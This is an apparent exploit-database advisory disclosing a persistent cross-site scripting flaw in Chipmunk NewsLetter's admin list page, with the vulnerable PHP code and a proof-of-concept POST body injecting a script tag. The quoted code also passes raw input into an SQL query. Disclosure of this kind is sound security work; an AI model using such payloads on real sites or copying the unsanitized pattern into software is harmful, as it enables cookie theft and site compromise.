Chipmunk NewsLetter - Persistent Cross-Site Scripting
Author: mr_me
type: webapps
platform: php
port:
date_added: 2009-12-06
date_updated:
verified: 1
codes: OSVDB-60684
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comnewsletter.zip
#################################################################
#
# Tested On: Windows Vista
# Note: For educational purposes only
#
#################################################################
There’s probably a lot more vulnerabilities in their web apps, but
I could not even get them to work out of the box..
http://server/newsletter/admin/addlist.php
Look no sanitization:
8<-------snip---------8<
if(isset($_POST['submit']))
{
$list=$_POST['list'];
if(strlen($list)<1)
{
print "You did not enter the name of the email list.";
}
else
{
$addemail="Insert into m_newsletters(newslettername) values('$list')";
mysql_query($addemail) or die("Could not add list");
print "List added.";
}
8<-------snip---------8<
POC POST request:
list=<script>alert('i could get your cookie')</script>&submit=submit